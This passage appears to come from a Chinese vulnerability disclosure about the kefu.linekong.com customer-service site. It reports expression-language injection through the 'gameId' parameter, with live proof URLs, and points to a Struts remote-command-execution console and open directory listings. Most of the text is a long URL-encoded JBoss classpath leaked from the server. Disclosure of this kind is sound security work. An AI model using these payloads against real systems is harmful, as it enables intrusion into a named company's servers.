oy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstandard.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-system.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp9054605725472407847uuid-key-generator.sar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4721933770079764377asm.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7736534739160670581odmg-3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxml-apis.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fresolver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbosssx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6494116799749547601asm-attrs.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-beanutils-1.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar-contents%2Fjboss-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjson-lib-2.2.3-jdk15.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fojdbc14.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3338334323483414043tomcat-coyote.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-common-jdbc-wrapper.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-common.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Flog4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7388988018869166078jboss-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbcel.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fsnmp-support.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3107141233706702374hibernate-metadata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinekongUtil.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-codec-1.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjaxen.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fedb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fclasses12.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-deployer.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-tabletags.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjstl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fbin%2Frun.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp112530474983911386hibernate3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Flog4j-boot.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-validator-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jsr77.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7886344676930699333jboss-hibernate.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6517159087966278511commons-el.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fdom4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-ws4ee.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jca.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-chain-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3101766708196706282servlets-default.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8163783107672278399tomcat55-service.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1928911703526671619servlets-invoker.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4302262592943089697jboss-ha-xa-jdbc.rar-contents%2Fjboss-ha-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3235264501345629664javassist.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fwebcallbackhandler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjmx-adaptor-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbindingservice-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-jmx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fautonumber-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp77632742320883920jasper-runtime.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjsonplugin-0%5B1%5D.31.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-monitoring.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5913486598487930136trove.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-io-1.3.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp2498765583516090332tomcat-http.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fdwr-1.1-beta-3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8171336813031228483axis-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6336219452933413902antlr-2.7.5H3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-httpclient-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fognl-2.6.11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3332293537302222734catalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fhsqldb-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5458039299239960074tomcat-ajp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-collections-3.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4440913937618162919cglib-2.1.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunjce_provider.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6346206992602066763jboss-aop.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar-contents%2Fjboss-xa-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Ffreemarker-2.3.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flog4j-1.2.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-httpclient.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fconcurrent.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fcommons-logging.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Fclasses%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxmlrpc-2.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3702522107702055184commons-modeler.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fdnsns.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjdom.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbsh-1.3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-j2ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-codebehind-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1099151691146069103wsdl4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6237404052211161026naming-resources.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxalan.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fezmorph-1.0.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar-contents%2Fmail-ra.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp393639702798507697commons-discovery.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Foro-2.0.8.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-lang-2.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-pattern.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2FxercesImpl.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fmail-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar-contents%2Fjboss-ha-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-hibernate.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Factivation.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjnpserver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin-example.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jaxrpc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-core-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2FROOT.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-saaj.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fconf%2F%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Flib%2Ftools.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbossmq.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6144956477623102918catalina-manager.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8301739402364757125tomcat-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscout.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fproperties-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3285496549751174622jboss-aspect-library.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jsp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fantlr-2.7.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fgnu-regexp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-pell-multipart-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5900502660985595292catalina-optional.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-fileupload-1.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-transaction.jar%2C+org.apache.catalina.WELCOME_FILES%3D%5BLjava.lang.String%3B%40114d662%2C+org.apache.catalina.resources%3Dorg.apache.naming.resources.ProxyDirContext%40106c6be%7D"


二、远程命令执行漏洞
WooYun: 大众点评某分站存在远程命令执行漏洞2
地址:http://kefu.linekong.com/eService/struts/webconsole.html

QQ图片20150623145742.png


三、任意目录访问
http://kefu.linekong.com/eService/css/
http://kefu.linekong.com/eService/download/
http://kefu.linekong.com/eService/images/
http://kefu.linekong.com/eService/js/

QQ图片20150623150147.png

漏洞证明:

站点:http://kefu.linekong.com
一、Expression language injection
地址1:http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4
测试效果:

QQ图片20150623144319.png


打开该地址并查看源代码: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4

/eService/system/generateRandomcode.do?gameId=%7Bfreemarker.Configuration%3Dfreemarker.template.Configuration%40109037d%2C+javax.servlet.context.tempdir%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fwork%2Fjboss.web%2Flocalhost%2FeService%2C+org.apache.catalina.jsp_classpath%3D%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp1995774417485222525servlets-webdav.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fnamespace.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Flocaledata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-api-1.1.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-logging-1.0.4.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcatalina.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-management.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinkongXworkExt-1.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Flucene-core-2.4.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4325827586775467154mail-ra.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7316256627554902626jasper-compiler-jdt.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3920996984715942540jboss-ws4ee.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7302355716144682924jasper-compiler.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-aop.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-config-browser-plugin-2.0.11.2.jar%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Fjre%2Flib%2Fext%2Fsunpkcs11.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fxwork-2.0.5.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstandard.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-system.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp9054605725472407847uuid-key-generator.sar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4721933770079764377asm.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7736534739160670581odmg-3.0.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fxml-apis.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fendorsed%2Fresolver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbosssx.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6494116799749547601asm-attrs.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-beanutils-1.6.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp4079816805034329639jboss-local-jdbc.rar-contents%2Fjboss-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fjson-lib-2.2.3-jdk15.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fojdbc14.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3338334323483414043tomcat-coyote.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-common-jdbc-wrapper.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjboss-common.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Flog4j.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7388988018869166078jboss-ws4ee.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fbcel.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fsnmp-support.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3107141233706702374hibernate-metadata.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3151033304315455207jboss-xa-jdbc.rar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2FlinekongUtil.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjpl-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-codec-1.3.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fjaxen.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fedb.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%